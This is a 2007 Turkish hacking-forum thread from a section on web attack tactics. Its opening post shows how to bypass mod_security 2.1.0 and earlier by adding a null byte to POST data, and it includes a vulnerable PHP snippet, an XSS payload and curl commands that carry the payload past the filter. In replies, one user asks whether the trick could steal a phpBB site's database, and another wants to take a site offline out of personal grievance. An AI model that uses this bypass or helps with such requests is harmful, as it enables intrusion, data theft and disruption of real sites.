Tahribat.Com | PHP De Mod_security <= 2.1.0 Atlatma [6 Mart]

Bölümler
Hizmetler
Hakkımızda
Üyelik

	Ana Sayfa
	Döküman Arşivi
	Bilişim Terimleri Sözlüğü
	Hiç Bitmeyen Hikaye
	Tahribat Forum

	Biz Kimiz?
	Sık Sorulan Sorular
	Tahribat.Com Kuralları
	Tahribat.Com Hakkında
	Site Haritası
	İletişim

	Üye ol
	Üye Girişi
	Şifremi Unuttum

	Tahribat.com Programları
	Dosya Arşivi
	Haber Arşivi
	Tahribat Translator
	Duvar Kağıtları - Plakaları
	Tahribat.Com Servisleri

Giriş Yap

Kayıt ol

Online Üyeler

Aktif Konular

Arama

Üyeler

Forum Kuralları

Tahribat.Com | PHP De Mod_security <= 2.1.0 Atlatma [6 Mart]

Tahribat.Com Forumları Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri PHP De Mod_security <= 2.1.0 Atlatma [6 Mart]

Konu 6 Nisan 2007 (Cuma) 21:38 tarihinde açıldı.

Kısayol |

Alıntı yap |

Özel Mesaj

ir2

Kayıt : 10 Mayis 2003
Erkek Üye

mod_security 2.1.0 ve aşağısındaki tüm sürümlerde bulunan süper açık el yapımı mod_security e güvenen tüm php coderlarını kara kara düşündürücek nitelikte :)

olay şöyle;
diyelimki bir php kodumuz var
<?php
if (isset($_POST['var'])
echo($_POST['var']);
?>
şeklinde gelen bütün postları ekrana yazdırıyoruz.

mod_security aktif diyelim... sayfaya post olarak

&var=<script>alert(/xss/);</script>

verisini gönderdik.. default configde ayar yoksa kodumuz çıkıcaktır yine.. yada engellenebilinir mod_security tarafından engellenmese bile log dosyasında XSS saldırısı olaiblir diye kayıt eklenicek.

buraya kadar herşey normal.. bu query mizin başına ascii 0 karakteri eklediğimizde mod_security i aşaibliyoruz !
örnek olarak;

$ echo -e "\000&var=<script>alert(/xss/);</script>" > postdata
$ curl http://localhost/test.php --data-binary @postdata -A HarmlessUserAgent
<script>alert(/xss/);</script>

bu curl kullanan linuxcu abilerimiz için yabancı bi sitede hazırlanmış kod.. tabi aynı karakteri windowsdada hazırlayıp post edebilirsiniz örneğin denyolaunch un test tuşu ile tek bir post verisi göndererek.. gersi sizin yaratıcılığınıza kalmış. :)

kaynak: http://www.php-security.org/MOPB/BONUS-12-2007.html

[ msn: ir2@ir2.org ]

6 Nisan 2007 (Cuma) 21:41 tarihinde yazıldı.

Kısayol |

Alıntı yap |

Özel Mesaj

Google

Kayıt : 26 Agustos 2005
İstanbul
Erkek Üye

ouww saol hoca işe yarar açık.

Abra Kadabra

16 Nisan 2007 (Pazartesi) 13:57 tarihinde yazıldı.

Kısayol |

Alıntı yap |

Özel Mesaj

MaTRaX

Kayıt : 10 Nisan 2006
2.KomandoTugayi/Bolu
Erkek Üye

Güzel tam anladığım gibi birşey olmuş da bunu farklı sürümlerde deneyemeyiz dimi ?

Mesela Php B.B. 2.0.22 de bir açık bulabilir miyiz ya da bu açığı bu sürümde de kullanabilir miyiz ?

Rus ile aldatmayanı etmeli takdir,tek biri ile uslanmayanın hakkı köçektir.

16 Nisan 2007 (Pazartesi) 15:21 tarihinde yazıldı.

Kısayol |

Alıntı yap |

Özel Mesaj

Tayok

Kayıt : 4 Mart 2007
Erkek Üye

ya ben anlamadım açıkçası ama sanırım önemli bir açık. Şimdi bir soru soracam ama diyeceksiniz ki biz amelemiyiz yada ezikmisin felan ben genede sormak istiyorum...

Ya bi forum var phpbb ve phpbb security mod yüklü. Ve o sitenin database sini elime geçirmem lazım çok güzel ve önemli bilgiler var sitede. Bu açıkla database ele geçirmem gibi bir olay söz konusu mu . Sanırım hayır amaemin olmadığım için cevabınızı bekliyorum..

16 Nisan 2007 (Pazartesi) 15:27 tarihinde yazıldı.

Kısayol |

Alıntı yap |

Özel Mesaj

MaTRaX

Kayıt : 10 Nisan 2006
2.KomandoTugayi/Bolu
Erkek Üye

Tayok aynı durumu ben de yapmak istiyorum ve ben önce flood denemesi yapmak istedim ama phpbb olduğu için bunun koruması olduğunu öğrendim sonra..

Tabiki mantıklı olarak böyle bir açık bulma yoluna girdim..

Ben bilgileri ele geçirmek değil de direk olarak siteye erişimi engellemek istiyorum..
Site hayatımı göçertti a.k..

Eğer bilgisi olan varsa bizlerle paylaşırsa sevinirim..

Sakın aklınıza sömürmek ya da parazit gibi yararlanmak gelmesin tamamen ihtiyacım olduğu için ve gerekli olduğu için istiyorum..

Saygılarımla..